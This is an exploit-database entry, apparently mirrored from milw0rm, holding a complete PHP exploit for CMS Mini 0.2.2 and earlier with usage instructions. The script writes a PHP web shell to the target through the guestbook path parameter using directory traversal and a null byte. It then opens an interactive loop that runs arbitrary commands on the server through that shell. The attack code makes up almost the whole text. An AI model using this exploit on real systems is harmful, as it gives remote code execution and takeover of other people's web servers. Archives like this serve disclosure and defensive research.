CMS Mini <= 0.2.2 - Remote Command Execution Exploit

2014-07-0100:00:00
Root
www.seebug.org
JSON
No description provided by source.

                                                --+++================================================================+++--
--+++====== CMS Mini &#60;= 0.2.2 Remote Command Execution Exploit ======+++--
--+++================================================================+++--

&#60;?php

function usage ()
{
	exit (
		&#34;\nCMS Mini &#60;= 0.2.2 Remote Command Execution Exploit&#34;.
		&#34;\n[+] Author  : darkjoker&#34;.
		&#34;\n[+] Site    : http://darkjoker.net23.net&#34;.
		&#34;\n[+] Download: http://ovh.dl.sourceforge.net/sourceforge/cmsmini/cmsmini-0.2.2.tar.gz&#34;.
		&#34;\n[+] Usage   : php xpl.php &#60;hostname&#62; &#60;path&#62;&#34;.
		&#34;\n[+] Ex.     : php xpl.php localhost /CMSmini&#34;.
		&#34;\n\n&#34;);
}

if ($argc != 3)
	usage;
$hostname = $argv [1];
$path = $argv [2];
$fp = fsockopen ($hostname, 80);
$post = &#34;message=&#60;? system (\$_GET [&#39;cmd&#39;]); die ();?&#62;&#34;;
$request = &#34;POST {$path}/view/index.php?op=guestbook&path=..&p=file.php%00 HTTP/1.1\r\n&#34;.
	   &#34;Host: $hostname\r\n&#34;.
	   &#34;Connection: Close\r\n&#34;.
	   &#34;Content-Type: application/x-www-form-urlencoded\r\n&#34;.
	   &#34;Content-Length: &#34; . strlen ($post) . &#34;\r\n\r\n&#34;.
	   $post;
fputs ($fp, $request);
fclose ($fp);
$stdin = fopen(&#34;php://stdin&#34;, &#34;r&#34;);
while (1)
{
	echo &#34;$ &#34;;
	$cmd = str_replace (&#34; &#34;, &#34;%20&#34;, trim (fgets ($stdin, 1024)));
	if ($cmd == &#34;exit&#34;)
	{
		file_get_contents (&#34;http://{$hostname}{$path}/file.php?cmd=rm%20file.php&#34;);
		break;
	}
	echo file_get_contents (&#34;http://{$hostname}{$path}/file.php?cmd={$cmd}&#34;);
	
}
fclose ($stdin);
?&#62;

# milw0rm.com [2009-02-02]
JSON